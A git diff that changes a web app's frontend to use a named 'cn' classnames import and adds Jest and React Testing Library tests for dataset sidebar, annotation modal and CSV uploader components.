{ diff --git a/web/app/components/app-sidebar/app-info.tsx b/web/app/components/app-sidebar/app-info.tsx index f143c2fcef..1b4377c10a 100644 --- a/web/app/components/app-sidebar/app-info.tsx +++ b/web/app/components/app-sidebar/app-info.tsx @@ -29,7 +29,7 @@ import CardView from '@/app/(commonLayout)/app/(appDetailLayout)/[appId]/overvie import type { Operation } from './app-operations' import AppOperations from './app-operations' import dynamic from 'next/dynamic' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AppModeEnum } from '@/types/app' const SwitchAppModal = dynamic(() => import('@/app/components/app/switch-app-modal'), { diff --git a/web/app/components/app-sidebar/app-sidebar-dropdown.tsx b/web/app/components/app-sidebar/app-sidebar-dropdown.tsx index 3c5d38dd82..04634906af 100644 --- a/web/app/components/app-sidebar/app-sidebar-dropdown.tsx +++ b/web/app/components/app-sidebar/app-sidebar-dropdown.tsx @@ -16,7 +16,7 @@ import AppInfo from './app-info' import NavLink from './navLink' import { useStore as useAppStore } from '@/app/components/app/store' import type { NavIcon } from './navLink' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AppModeEnum } from '@/types/app' type Props = { diff --git a/web/app/components/app-sidebar/dataset-info/dropdown.tsx b/web/app/components/app-sidebar/dataset-info/dropdown.tsx index ff110f70bd..dc46af2d02 100644 --- a/web/app/components/app-sidebar/dataset-info/dropdown.tsx +++ b/web/app/components/app-sidebar/dataset-info/dropdown.tsx @@ -2,7 +2,7 @@ import React, { useCallback, useState } from 'react' import { PortalToFollowElem, PortalToFollowElemContent, PortalToFollowElemTrigger } from '../../base/portal-to-follow-elem' import ActionButton from '../../base/action-button' import { RiMoreFill } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Menu from './menu' import { useSelector as useAppContextWithSelector } from '@/context/app-context' import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' diff --git a/web/app/components/app-sidebar/dataset-info/index.spec.tsx b/web/app/components/app-sidebar/dataset-info/index.spec.tsx new file mode 100644 index 0000000000..3674be6658 --- /dev/null +++ b/web/app/components/app-sidebar/dataset-info/index.spec.tsx @@ -0,0 +1,379 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DatasetInfo from './index' +import Dropdown from './dropdown' +import Menu from './menu' +import MenuItem from './menu-item' +import type { DataSet } from '@/models/datasets' +import { + ChunkingMode, + DataSourceType, + DatasetPermission, +} from '@/models/datasets' +import { RETRIEVE_METHOD } from '@/types/app' +import { RiEditLine } from '@remixicon/react' + +let mockDataset: DataSet +let mockIsDatasetOperator = false +const mockReplace = jest.fn() +const mockInvalidDatasetList = jest.fn() +const mockInvalidDatasetDetail = jest.fn() +const mockExportPipeline = jest.fn() +const mockCheckIsUsedInApp = jest.fn() +const mockDeleteDataset = jest.fn() + +const createDataset = (overrides: Partial = {}): DataSet => ({ + id: 'dataset-1', + name: 'Dataset Name', + indexing_status: 'completed', + icon_info: { + icon: '📙', + icon_background: '#FFF4ED', + icon_type: 'emoji', + icon_url: '', + }, + description: 'Dataset description', + permission: DatasetPermission.onlyMe, + data_source_type: DataSourceType.FILE, + indexing_technique: 'high_quality' as DataSet['indexing_technique'], + created_by: 'user-1', + updated_by: 'user-1', + updated_at: 1690000000, + app_count: 0, + doc_form: ChunkingMode.text, + document_count: 1, + total_document_count: 1, + word_count: 1000, + provider: 'internal', + embedding_model: 'text-embedding-3', + embedding_model_provider: 'openai', + embedding_available: true, + retrieval_model_dict: { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 5, + score_threshold_enabled: false, + score_threshold: 0, + }, + retrieval_model: { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 5, + score_threshold_enabled: false, + score_threshold: 0, + }, + tags: [], + external_knowledge_info: { + external_knowledge_id: '', + external_knowledge_api_id: '', + external_knowledge_api_name: '', + external_knowledge_api_endpoint: '', + }, + external_retrieval_model: { + top_k: 0, + score_threshold: 0, + score_threshold_enabled: false, + }, + built_in_field_enabled: false, + runtime_mode: 'rag_pipeline', + enable_api: false, + is_multimodal: false, + ...overrides, +}) + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + replace: mockReplace, + }), +})) + +jest.mock('@/context/dataset-detail', () => ({ + useDatasetDetailContextWithSelector: (selector: (state: { dataset?: DataSet }) => unknown) => selector({ dataset: mockDataset }), +})) + +jest.mock('@/context/app-context', () => ({ + useSelector: (selector: (state: { isCurrentWorkspaceDatasetOperator: boolean }) => unknown) => + selector({ isCurrentWorkspaceDatasetOperator: mockIsDatasetOperator }), +})) + +jest.mock('@/service/knowledge/use-dataset', () => ({ + datasetDetailQueryKeyPrefix: ['dataset', 'detail'], + useInvalidDatasetList: () => mockInvalidDatasetList, +})) + +jest.mock('@/service/use-base', () => ({ + useInvalid: () => mockInvalidDatasetDetail, +})) + +jest.mock('@/service/use-pipeline', () => ({ + useExportPipelineDSL: () => ({ + mutateAsync: mockExportPipeline, + }), +})) + +jest.mock('@/service/datasets', () => ({ + checkIsUsedInApp: (...args: unknown[]) => mockCheckIsUsedInApp(...args), + deleteDataset: (...args: unknown[]) => mockDeleteDataset(...args), +})) + +jest.mock('@/hooks/use-knowledge', () => ({ + useKnowledge: () => ({ + formatIndexingTechniqueAndMethod: () => 'indexing-technique', + }), +})) + +jest.mock('@/app/components/datasets/rename-modal', () => ({ + __esModule: true, + default: ({ + show, + onClose, + onSuccess, + }: { + show: boolean + onClose: () => void + onSuccess?: () => void + }) => { + if (!show) + return null + return ( +
+ + +
+ ) + }, +})) + +const openMenu = async (user: ReturnType) => { + const trigger = screen.getByRole('button') + await user.click(trigger) +} + +describe('DatasetInfo', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset() + mockIsDatasetOperator = false + }) + + // Rendering of dataset summary details based on expand and dataset state. + describe('Rendering', () => { + it('should show dataset details when expanded', () => { + // Arrange + mockDataset = createDataset({ is_published: true }) + render() + + // Assert + expect(screen.getByText('Dataset Name')).toBeInTheDocument() + expect(screen.getByText('Dataset description')).toBeInTheDocument() + expect(screen.getByText('dataset.chunkingMode.general')).toBeInTheDocument() + expect(screen.getByText('indexing-technique')).toBeInTheDocument() + }) + + it('should show external tag when provider is external', () => { + // Arrange + mockDataset = createDataset({ provider: 'external', is_published: false }) + render() + + // Assert + expect(screen.getByText('dataset.externalTag')).toBeInTheDocument() + expect(screen.queryByText('dataset.chunkingMode.general')).not.toBeInTheDocument() + }) + + it('should hide detailed fields when collapsed', () => { + // Arrange + render() + + // Assert + expect(screen.queryByText('Dataset Name')).not.toBeInTheDocument() + expect(screen.queryByText('Dataset description')).not.toBeInTheDocument() + }) + }) +}) + +describe('MenuItem', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Event handling for menu item interactions. + describe('Interactions', () => { + it('should call handler when clicked', async () => { + const user = userEvent.setup() + const handleClick = jest.fn() + // Arrange + render() + + // Act + await user.click(screen.getByText('Edit')) + + // Assert + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) +}) + +describe('Menu', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset() + }) + + // Rendering of menu options based on runtime mode and delete visibility. + describe('Rendering', () => { + it('should show edit, export, and delete options when rag pipeline and deletable', () => { + // Arrange + mockDataset = createDataset({ runtime_mode: 'rag_pipeline' }) + render( + , + ) + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + expect(screen.getByText('datasetPipeline.operations.exportPipeline')).toBeInTheDocument() + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + + it('should hide export and delete options when not rag pipeline and not deletable', () => { + // Arrange + mockDataset = createDataset({ runtime_mode: 'general' }) + render( + , + ) + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + expect(screen.queryByText('datasetPipeline.operations.exportPipeline')).not.toBeInTheDocument() + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + }) +}) + +describe('Dropdown', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset({ pipeline_id: 'pipeline-1', runtime_mode: 'rag_pipeline' }) + mockIsDatasetOperator = false + mockExportPipeline.mockResolvedValue({ data: 'pipeline-content' }) + mockCheckIsUsedInApp.mockResolvedValue({ is_using: false }) + mockDeleteDataset.mockResolvedValue({}) + if (!('createObjectURL' in URL)) { + Object.defineProperty(URL, 'createObjectURL', { + value: jest.fn(), + writable: true, + }) + } + if (!('revokeObjectURL' in URL)) { + Object.defineProperty(URL, 'revokeObjectURL', { + value: jest.fn(), + writable: true, + }) + } + }) + + // Rendering behavior based on workspace role. + describe('Rendering', () => { + it('should hide delete option when user is dataset operator', async () => { + const user = userEvent.setup() + // Arrange + mockIsDatasetOperator = true + render() + + // Act + await openMenu(user) + + // Assert + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + }) + + // User interactions that trigger modals and exports. + describe('Interactions', () => { + it('should open rename modal when edit is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByTestId('rename-modal')).toBeInTheDocument() + }) + + it('should export pipeline when export is clicked', async () => { + const user = userEvent.setup() + const anchorClickSpy = jest.spyOn(HTMLAnchorElement.prototype, 'click') + const createObjectURLSpy = jest.spyOn(URL, 'createObjectURL') + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('datasetPipeline.operations.exportPipeline')) + + // Assert + await waitFor(() => { + expect(mockExportPipeline).toHaveBeenCalledWith({ + pipelineId: 'pipeline-1', + include: false, + }) + }) + expect(createObjectURLSpy).toHaveBeenCalledTimes(1) + expect(anchorClickSpy).toHaveBeenCalledTimes(1) + }) + + it('should show delete confirmation when delete is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.delete')) + + // Assert + await waitFor(() => { + expect(screen.getByText('dataset.deleteDatasetConfirmContent')).toBeInTheDocument() + }) + }) + + it('should delete dataset and redirect when confirm is clicked', async () => { + const user = userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.delete')) + await user.click(await screen.findByRole('button', { name: 'common.operation.confirm' })) + + // Assert + await waitFor(() => { + expect(mockDeleteDataset).toHaveBeenCalledWith('dataset-1') + }) + expect(mockInvalidDatasetList).toHaveBeenCalledTimes(1) + expect(mockReplace).toHaveBeenCalledWith('/datasets') + }) + }) +}) diff --git a/web/app/components/app-sidebar/dataset-info/index.tsx b/web/app/components/app-sidebar/dataset-info/index.tsx index 44b0baa72b..bace656d54 100644 --- a/web/app/components/app-sidebar/dataset-info/index.tsx +++ b/web/app/components/app-sidebar/dataset-info/index.tsx @@ -8,7 +8,7 @@ import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' import type { DataSet } from '@/models/datasets' import { DOC_FORM_TEXT } from '@/models/datasets' import { useKnowledge } from '@/hooks/use-knowledge' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Dropdown from './dropdown' type DatasetInfoProps = { diff --git a/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx b/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx index ac07333712..cf380d00d2 100644 --- a/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx +++ b/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx @@ -11,7 +11,7 @@ import AppIcon from '../base/app-icon' import Divider from '../base/divider' import NavLink from './navLink' import type { NavIcon } from './navLink' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' import Effect from '../base/effect' import Dropdown from './dataset-info/dropdown' diff --git a/web/app/components/app-sidebar/index.tsx b/web/app/components/app-sidebar/index.tsx index 86de2e2034..fe52c4cfa2 100644 --- a/web/app/components/app-sidebar/index.tsx +++ b/web/app/components/app-sidebar/index.tsx @@ -9,7 +9,7 @@ import AppSidebarDropdown from './app-sidebar-dropdown' import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' import { useStore as useAppStore } from '@/app/components/app/store' import { useEventEmitterContextContext } from '@/context/event-emitter' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Divider from '../base/divider' import { useHover, useKeyPress } from 'ahooks' import ToggleButton from './toggle-button' diff --git a/web/app/components/app-sidebar/navLink.tsx b/web/app/components/app-sidebar/navLink.tsx index ad90b91250..f6d8e57682 100644 --- a/web/app/components/app-sidebar/navLink.tsx +++ b/web/app/components/app-sidebar/navLink.tsx @@ -2,7 +2,7 @@ import React from 'react' import { useSelectedLayoutSegment } from 'next/navigation' import Link from 'next/link' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { RemixiconComponentType } from '@remixicon/react' export type NavIcon = React.ComponentType< @@ -42,7 +42,7 @@ const NavLink = ({ const NavIcon = isActive ? iconMap.selected : iconMap.normal const renderIcon = () => ( -
+
) @@ -53,21 +53,17 @@ const NavLink = ({ key={name} type='button' disabled - className={classNames( - 'system-sm-medium flex h-8 cursor-not-allowed items-center rounded-lg text-components-menu-item-text opacity-30 hover:bg-components-menu-item-bg-hover', - 'pl-3 pr-1', - )} + className={cn('system-sm-medium flex h-8 cursor-not-allowed items-center rounded-lg text-components-menu-item-text opacity-30 hover:bg-components-menu-item-bg-hover', + 'pl-3 pr-1')} title={mode === 'collapse' ? name : ''} aria-disabled > {renderIcon()} {name} @@ -79,22 +75,18 @@ const NavLink = ({ {renderIcon()} {name} diff --git a/web/app/components/app-sidebar/toggle-button.tsx b/web/app/components/app-sidebar/toggle-button.tsx index 8de6f887f6..4f69adfc34 100644 --- a/web/app/components/app-sidebar/toggle-button.tsx +++ b/web/app/components/app-sidebar/toggle-button.tsx @@ -1,7 +1,7 @@ import React from 'react' import Button from '../base/button' import { RiArrowLeftSLine, RiArrowRightSLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Tooltip from '../base/tooltip' import { useTranslation } from 'react-i18next' import { getKeyboardKeyNameBySystem } from '../workflow/utils' diff --git a/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..f226adf22b --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,47 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import EditItem, { EditItemType } from './index' + +describe('AddAnnotationModal/EditItem', () => { + test('should render query inputs with user avatar and placeholder strings', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.queryName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toBeInTheDocument() + expect(screen.getByText('Why?')).toBeInTheDocument() + }) + + test('should render answer name and placeholder text', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.answerName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toBeInTheDocument() + expect(screen.getByDisplayValue('Existing answer')).toBeInTheDocument() + }) + + test('should propagate changes when answer content updates', () => { + const handleChange = jest.fn() + render( + , + ) + + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { target: { value: 'Because' } }) + expect(handleChange).toHaveBeenCalledWith('Because') + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..3103e3c96d --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx @@ -0,0 +1,155 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import AddAnnotationModal from './index' +import { useProviderContext } from '@/context/provider-context' + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +const mockToastNotify = jest.fn() +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(args => mockToastNotify(args)), + }, +})) + +jest.mock('@/app/components/billing/annotation-full', () => () =>
) + +const mockUseProviderContext = useProviderContext as jest.Mock + +const getProviderContext = ({ usage = 0, total = 10, enableBilling = false } = {}) => ({ + plan: { + usage: { annotatedResponse: usage }, + total: { annotatedResponse: total }, + }, + enableBilling, +}) + +describe('AddAnnotationModal', () => { + const baseProps = { + isShow: true, + onHide: jest.fn(), + onAdd: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + mockUseProviderContext.mockReturnValue(getProviderContext()) + }) + + const typeQuestion = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder'), { + target: { value }, + }) + } + + const typeAnswer = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { + target: { value }, + }) + } + + test('should render modal title when drawer is visible', () => { + render() + + expect(screen.getByText('appAnnotation.addModal.title')).toBeInTheDocument() + }) + + test('should capture query input text when typing', () => { + render() + typeQuestion('Sample question') + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('Sample question') + }) + + test('should capture answer input text when typing', () => { + render() + typeAnswer('Sample answer') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('Sample answer') + }) + + test('should show annotation full notice and disable submit when quota exceeded', () => { + mockUseProviderContext.mockReturnValue(getProviderContext({ usage: 10, total: 10, enableBilling: true })) + render() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.add' })).toBeDisabled() + }) + + test('should call onAdd with form values when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + fireEvent.click(screen.getByTestId('checkbox-create-next-checkbox')) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(onAdd).toHaveBeenCalledWith({ question: 'Question value', answer: 'Answer value' }) + }) + + test('should reset fields after saving when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + const createNextToggle = screen.getByText('appAnnotation.addModal.createNext').previousElementSibling as HTMLElement + fireEvent.click(createNextToggle) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + await waitFor(() => { + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('') + }) + }) + + test('should show toast when validation fails for missing question', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.queryRequired', + })) + }) + + test('should show toast when validation fails for missing answer', () => { + render() + typeQuestion('Filled question') + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.answerRequired', + })) + }) + + test('should close modal when save completes and create next unchecked', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Q') + typeAnswer('A') + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(baseProps.onHide).toHaveBeenCalled() + }) + + test('should allow cancel button to close the drawer', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + expect(baseProps.onHide).toHaveBeenCalled() + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.tsx b/web/app/components/app/annotation/add-annotation-modal/index.tsx index 274a57adf1..0ae4439531 100644 --- a/web/app/components/app/annotation/add-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/add-annotation-modal/index.tsx @@ -101,7 +101,7 @@ const AddAnnotationModal: FC = ({
- setIsCreateNext(!isCreateNext)} /> + setIsCreateNext(!isCreateNext)} />
{t('appAnnotation.addModal.createNext')}
diff --git a/web/app/components/app/annotation/batch-action.spec.tsx b/web/app/components/app/annotation/batch-action.spec.tsx new file mode 100644 index 0000000000..36440fc044 --- /dev/null +++ b/web/app/components/app/annotation/batch-action.spec.tsx @@ -0,0 +1,42 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import BatchAction from './batch-action' + +describe('BatchAction', () => { + const baseProps = { + selectedIds: ['1', '2', '3'], + onBatchDelete: jest.fn(), + onCancel: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should show the selected count and trigger cancel action', () => { + render() + + expect(screen.getByText('3')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.batchAction.selected')).toBeInTheDocument() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + expect(baseProps.onCancel).toHaveBeenCalledTimes(1) + }) + + it('should confirm before running batch delete', async () => { + const onBatchDelete = jest.fn().mockResolvedValue(undefined) + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.delete' })) + await screen.findByText('appAnnotation.list.delete.title') + + await act(async () => { + fireEvent.click(screen.getAllByRole('button', { name: 'common.operation.delete' })[1]) + }) + + await waitFor(() => { + expect(onBatchDelete).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/annotation/batch-action.tsx b/web/app/components/app/annotation/batch-action.tsx index 6e80d0c4c8..6ff392d17e 100644 --- a/web/app/components/app/annotation/batch-action.tsx +++ b/web/app/components/app/annotation/batch-action.tsx @@ -3,7 +3,7 @@ import { RiDeleteBinLine } from '@remixicon/react' import { useTranslation } from 'react-i18next' import { useBoolean } from 'ahooks' import Divider from '@/app/components/base/divider' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Confirm from '@/app/components/base/confirm' const i18nPrefix = 'appAnnotation.batchAction' @@ -38,7 +38,7 @@ const BatchAction: FC = ({ setIsNotDeleting() } return ( -
+
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx new file mode 100644 index 0000000000..7d360cfc1b --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx @@ -0,0 +1,72 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import CSVDownload from './csv-downloader' +import I18nContext from '@/context/i18n' +import { LanguagesSupported } from '@/i18n-config/language' +import type { Locale } from '@/i18n-config' + +const downloaderProps: any[] = [] + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: jest.fn(() => ({ + CSVDownloader: ({ children, ...props }: any) => { + downloaderProps.push(props) + return
{children}
+ }, + Type: { Link: 'link' }, + })), +})) + +const renderWithLocale = (locale: Locale) => { + return render( + + + , + ) +} + +describe('CSVDownload', () => { + const englishTemplate = [ + ['question', 'answer'], + ['question1', 'answer1'], + ['question2', 'answer2'], + ] + const chineseTemplate = [ + ['问题', '答案'], + ['问题 1', '答案 1'], + ['问题 2', '答案 2'], + ] + + beforeEach(() => { + downloaderProps.length = 0 + }) + + it('should render the structure preview and pass English template data by default', () => { + renderWithLocale('en-US' as Locale) + + expect(screen.getByText('share.generation.csvStructureTitle')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.batchModal.template')).toBeInTheDocument() + + expect(downloaderProps[0]).toMatchObject({ + filename: 'template-en-US', + type: 'link', + bom: true, + data: englishTemplate, + }) + }) + + it('should switch to the Chinese template when locale matches the secondary language', () => { + const locale = LanguagesSupported[1] as Locale + renderWithLocale(locale) + + expect(downloaderProps[0]).toMatchObject({ + filename: `template-${locale}`, + data: chineseTemplate, + }) + }) +}) diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx new file mode 100644 index 0000000000..d94295c31c --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx @@ -0,0 +1,115 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CSVUploader, { type Props } from './csv-uploader' +import { ToastContext } from '@/app/components/base/toast' + +describe('CSVUploader', () => { + const notify = jest.fn() + const updateFile = jest.fn() + + const getDropElements = () => { + const title = screen.getByText('appAnnotation.batchModal.csvUploadTitle') + const dropZone = title.parentElement?.parentElement as HTMLDivElement | null + if (!dropZone || !dropZone.parentElement) + throw new Error('Drop zone not found') + const dropContainer = dropZone.parentElement as HTMLDivElement + return { dropZone, dropContainer } + } + + const renderComponent = (props?: Partial) => { + const mergedProps: Props = { + file: undefined, + updateFile, + ...props, + } + return render( + + + , + ) + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should open the file picker when clicking browse', () => { + const clickSpy = jest.spyOn(HTMLInputElement.prototype, 'click') + renderComponent() + + fireEvent.click(screen.getByText('appAnnotation.batchModal.browse')) + + expect(clickSpy).toHaveBeenCalledTimes(1) + clickSpy.mockRestore() + }) + + it('should toggle dragging styles and upload the dropped file', async () => { + const file = new File(['content'], 'input.csv', { type: 'text/csv' }) + renderComponent() + const { dropZone, dropContainer } = getDropElements() + + fireEvent.dragEnter(dropContainer) + expect(dropZone.className).toContain('border-components-dropzone-border-accent') + expect(dropZone.className).toContain('bg-components-dropzone-bg-accent') + + fireEvent.drop(dropContainer, { dataTransfer: { files: [file] } }) + + await waitFor(() => expect(updateFile).toHaveBeenCalledWith(file)) + expect(dropZone.className).not.toContain('border-components-dropzone-border-accent') + }) + + it('should ignore drop events without dataTransfer', () => { + renderComponent() + const { dropContainer } = getDropElements() + + fireEvent.drop(dropContainer) + + expect(updateFile).not.toHaveBeenCalled() + }) + + it('should show an error when multiple files are dropped', async () => { + const fileA = new File(['a'], 'a.csv', { type: 'text/csv' }) + const fileB = new File(['b'], 'b.csv', { type: 'text/csv' }) + renderComponent() + const { dropContainer } = getDropElements() + + fireEvent.drop(dropContainer, { dataTransfer: { files: [fileA, fileB] } }) + + await waitFor(() => expect(notify).toHaveBeenCalledWith({ + type: 'error', + message: 'datasetCreation.stepOne.uploader.validation.count', + })) + expect(updateFile).not.toHaveBeenCalled() + }) + + it('should propagate file selection changes through input change event', () => { + const file = new File(['row'], 'selected.csv', { type: 'text/csv' }) + const { container } = renderComponent() + const fileInput = container.querySelector('input[type="file"]') as HTMLInputElement + + fireEvent.change(fileInput, { target: { files: [file] } }) + + expect(updateFile).toHaveBeenCalledWith(file) + }) + + it('should render selected file details and allow change/removal', () => { + const file = new File(['data'], 'report.csv', { type: 'text/csv' }) + const { container } = renderComponent({ file }) + const fileInput = container.querySelector('input[type="file"]') as HTMLInputElement + + expect(screen.getByText('report')).toBeInTheDocument() + expect(screen.getByText('.csv')).toBeInTheDocument() + + const clickSpy = jest.spyOn(HTMLInputElement.prototype, 'click') + fireEvent.click(screen.getByText('datasetCreation.stepOne.uploader.change')) + expect(clickSpy).toHaveBeenCalled() + clickSpy.mockRestore() + + const valueSetter = jest.spyOn(fileInput, 'value', 'set') + const removeTrigger = screen.getByTestId('remove-file-button') + fireEvent.click(removeTrigger) + + expect(updateFile).toHaveBeenCalledWith() + expect(valueSetter).toHaveBeenCalledWith('') + }) +}) diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx index b98eb815f9..c9766135df 100644 --- a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx @@ -4,7 +4,7 @@ import React, { useEffect, useRef, useState } from 'react' import { useTranslation } from 'react-i18next' import { useContext } from 'use-context-selector' import { RiDeleteBinLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { Csv as CSVIcon } from '@/app/components/base/icons/src/public/files' import { ToastContext } from '@/app/components/base/toast' import Button from '@/app/components/base/button' @@ -114,7 +114,7 @@ const CSVUploader: FC = ({
-
+
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..5527340895 --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx @@ -0,0 +1,164 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import BatchModal, { ProcessStatus } from './index' +import { useProviderContext } from '@/context/provider-context' +import { annotationBatchImport, checkAnnotationBatchImportProgress } from '@/service/annotation' +import type { IBatchModalProps } from './index' +import Toast from '@/app/components/base/toast' + +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(), + }, +})) + +jest.mock('@/service/annotation', () => ({ + annotationBatchImport: jest.fn(), + checkAnnotationBatchImportProgress: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('./csv-downloader', () => ({ + __esModule: true, + default: () =>
, +})) + +let lastUploadedFile: File | undefined + +jest.mock('./csv-uploader', () => ({ + __esModule: true, + default: ({ file, updateFile }: { file?: File; updateFile: (file?: File) => void }) => ( +
+ + {file && {file.name}} +
+ ), +})) + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
